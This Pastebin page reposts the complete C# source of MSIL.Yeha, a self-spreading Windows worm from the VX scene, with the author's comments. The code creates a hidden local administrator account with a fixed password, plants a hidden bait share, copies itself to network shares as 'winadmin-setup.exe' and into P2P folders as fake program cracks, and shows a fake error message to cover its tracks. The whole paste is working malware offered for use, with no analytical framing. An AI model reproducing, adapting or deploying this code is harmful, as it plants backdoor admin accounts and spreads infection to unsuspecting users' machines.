API tools faq
paste
FlyFar

MSIL.Yeha - Source Code

FlyFar
Jun 26th, 2023
125
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 9.86 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*************************************************************
  2.  * C# - MSIL.Yeha
  3.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  4.  * by free0n
  5.  * vx13d.net free0n@vx13d.net
  6.  * ###########################################################
  7.  *
  8.  * Yeha works by first checking itself in the registry
  9.  * if it hasn't ran yet it will attempt to create a
  10.  * new hidden local admin user account named Yeha with the
  11.  * password yehawashere. After the account is created
  12.  * it creates a new network share in C:\Yeha and makes the
  13.  * directory as hidden. This is so if someone is browsing
  14.  * the network we might lure them in. Each time the exe
  15.  * is run it will spread to any open network shares that
  16.  * were found in the mru list in the registry. It copies
  17.  * as winadmin-setup.exe.
  18.  *
  19.  * After the share spreading is completed it copies itself
  20.  * to commonly shared p2p folders as cracks for programs
  21.  * found in the program files directory. For example if
  22.  * Trilian directory is found it creates a trillian-crack.exe
  23.  * once the p2p is done it will display message if the day
  24.  * is the 25th that Yeha has been here if it's not it
  25.  * displays a common windows error message.
  26.  *
  27.  * Note: This uses the same trick as Snoopy did as
  28.  * it looks like a console application but the output
  29.  * type is windows application so we don't get a dorky
  30.  * cmd window popping up when it's ran. Compiled with
  31.  * MS Visual C# express
  32.  *
  33.  * thx RRLF!
  34.  * keep vxing!
  35.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  36.  ************************************************************/
  37. /************************************************************
  38.  * Start of Program.cs
  39.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  40.  ************************************************************/
  41.  
  42. using System;
  43. using System.Collections.Generic;
  44. using System.Text;
  45. using System.Windows.Forms;
  46. using System.IO;
  47.  
  48. namespace Yeha {
  49.  
  50.     class Program {
  51.  
  52.         static void Main(string[] args) {
  53.  
  54.             Yeha yeha = new Yeha();
  55.             if (!yeha.chkIt()) {
  56.                 yeha.YehaUser();
  57.                 yeha.CreateShare(@"C:\Yeha", "Yeha");
  58.             }
  59.            
  60.             yeha.Share();
  61.             yeha.p2p();
  62.            
  63.             if (DateTime.Now.Day == 25) {
  64.                 MessageBox.Show("Yeha was here!", "Yeha", MessageBoxButtons.OK, MessageBoxIcon.Information);
  65.             } else {
  66.                 MessageBox.Show("Not a valid win32 program", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Error);
  67.             }
  68.         }
  69.     }
  70. }
  71.  
  72. /************************************************************
  73.  * Start of Yeha.cs
  74.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  75.  ************************************************************/
  76.  
  77. using System;
  78. using System.Text;
  79. using System.IO;
  80. using System.Diagnostics;
  81. using System.DirectoryServices;
  82. using Microsoft.Win32;
  83. using System.Collections;
  84. using System.Collections.Generic;
  85. using System.Management;
  86.  
  87. namespace Yeha {
  88.  
  89.     class Yeha {
  90.  
  91.         private string me = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
  92.        
  93.         public bool chkIt() {
  94.             //checking the registry to see if we have already ran. If
  95.             //we aren't found in the registry we add the value.
  96.             //Hkey local machine is good real estate ;)
  97.  
  98.             string regstr = (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\Yeha", "Yeha", "Yeha");
  99.             if (regstr == "Yeha") {
  100.                 return true;
  101.             } else {
  102.                 RegistryKey key = Registry.LocalMachine.OpenSubKey("Software", true);
  103.                 RegistryKey newkey = key.CreateSubKey("Yeha");
  104.                 newkey.SetValue("Yeha", me);
  105.                 return false;
  106.             }
  107.         }
  108.        
  109.         public void p2p() {
  110.  
  111.             //our p2p spreading is basically just a list of common folders
  112.             //if the folder exists we drop a copies of ourselves as cracks
  113.             //for programs we find the program files folder
  114.  
  115.             ArrayList arSharedFolders = new ArrayList();
  116.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Downloads");
  117.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\My Shared Folder");
  118.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Shared");
  119.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Ares\\My Shared Folder");
  120.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\Downloads");
  121.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\Shareaza\\Downloads");
  122.  
  123.             IEnumerator folder = arSharedFolders.GetEnumerator();
  124.             while (folder.MoveNext()) {
  125.                 string tada = Convert.ToString(folder.Current);
  126.                 if (Directory.Exists(tada)) {
  127.                     string progDir = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
  128.                     foreach (string d in Directory.GetDirectories(progDir)) {
  129.                         string app = tada + "\\" + d.Substring(d.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe";
  130.                         File.Copy(me, app, true);
  131.                     }
  132.                 }
  133.             }
  134.         }
  135.  
  136.         public void YehaUser() {
  137.  
  138.             try {
  139.  
  140.                 //create our new admin user account on the local machine we are running on.
  141.                 DirectoryEntry ad = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
  142.                 DirectoryEntry usr = ad.Children.Add("Yeha", "user");
  143.                 usr.Invoke("SetPassword", new object[] { "yehawashere" });
  144.                 usr.CommitChanges();
  145.  
  146.                 DirectoryEntry de;
  147.                 de = ad.Children.Find("Administrators", "group");
  148.                 if (de != null) {
  149.                     de.Invoke("Add", new object[] { usr.Path.ToString() });
  150.                 }
  151.                
  152.                 //now we need to make the user hidden from the login screen and the
  153.                 //user accounts applet in the control panel to do this we
  154.                 //use a reg hack.
  155.  
  156.                 try {
  157.                     string rkey = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList";
  158.                     Registry.SetValue(rkey, "Yeha", 0, RegistryValueKind.DWord);
  159.                 } catch (Exception er) { }
  160.  
  161.             } catch (Exception ex) { }
  162.         }
  163.  
  164.         public void Share() {
  165.  
  166.             //copy ourselves to all the local network shares on the computer
  167.             //this could be good bait when someone connects and wonders what
  168.             //winadmin-setup is.
  169.  
  170.             try {
  171.                 ManagementObjectSearcher shares = new
  172.                 ManagementObjectSearcher("select * from win32_share");
  173.                 foreach (ManagementObject serv in shares.Get()) {
  174.                     string shareName = Convert.ToString(serv["Name"]);
  175.                     if (!shareName.Contains("$")) {
  176.                         File.Copy(me, @"\\" + Environment.MachineName + @"\" + shareName + @"\winadmin-setup.exe", true);
  177.                     }
  178.                 }
  179.             } catch (Exception ex) { }
  180.  
  181.             //now we need to copy ourselves to other shares
  182.             //on the network to do this we check for network shares
  183.             //in the MRU list, we may get lucky we may not
  184.  
  185.             try {
  186.                 string key = @"Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU\";
  187.                 RegistryKey reg = Registry.CurrentUser.OpenSubKey(key); ;
  188.                 foreach (string valuename in reg.GetValueNames()) {
  189.                     string path = reg.GetValue(valuename).ToString();
  190.                     if (valuename.ToLower() != "mrulist") {
  191.                         try {
  192.                             File.Copy(me, path + @"\\winadmin-setup.exe", true);
  193.                         } catch (Exception er) {
  194.                             continue;
  195.                         }
  196.                     }
  197.                 }
  198.                 reg.Close();
  199.             } catch (Exception er) { }
  200.         }
  201.  
  202.         public void CreateShare(string dir, string name) {
  203.            
  204.             //we create our own shared folder on the network called Yeha
  205.             //this is so if we get a user browsing the network they might
  206.             //open it up and double click winadmin-setup.exe. You know a user
  207.             //might be more susceptible to pick it up if the folder was
  208.             //named pr0n or porn hehehe.
  209.  
  210.             try {
  211.                 Directory.CreateDirectory(dir);
  212.                 ManagementClass managementClass = new ManagementClass("Win32_Share");
  213.                 ManagementBaseObject inParams = managementClass.GetMethodParameters("Create");
  214.                 ManagementBaseObject outParams;
  215.                 inParams["Description"] = name;
  216.                 inParams["Name"] = name;
  217.                 inParams["Path"] = dir;
  218.                 inParams["Type"] = 0x0;
  219.                 outParams = managementClass.InvokeMethod("Create", inParams, null);
  220.                
  221.                 //if the return value was 0 then we know we got the folder created
  222.                 //so we are going to make it hidden..
  223.                 if ((uint)(outParams.Properties["ReturnValue"].Value) == 0) {
  224.             //make the dir hidden
  225.                     if (Directory.Exists(dir)) {
  226.                         DirectoryInfo d = new DirectoryInfo(dir);
  227.                         d.Attributes = FileAttributes.Hidden;
  228.                     }
  229.                 }
  230.            
  231.             } catch (Exception e) { }
  232.         }
  233.     }
  234. }
  235.  
  236.  
  237.  
  238.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!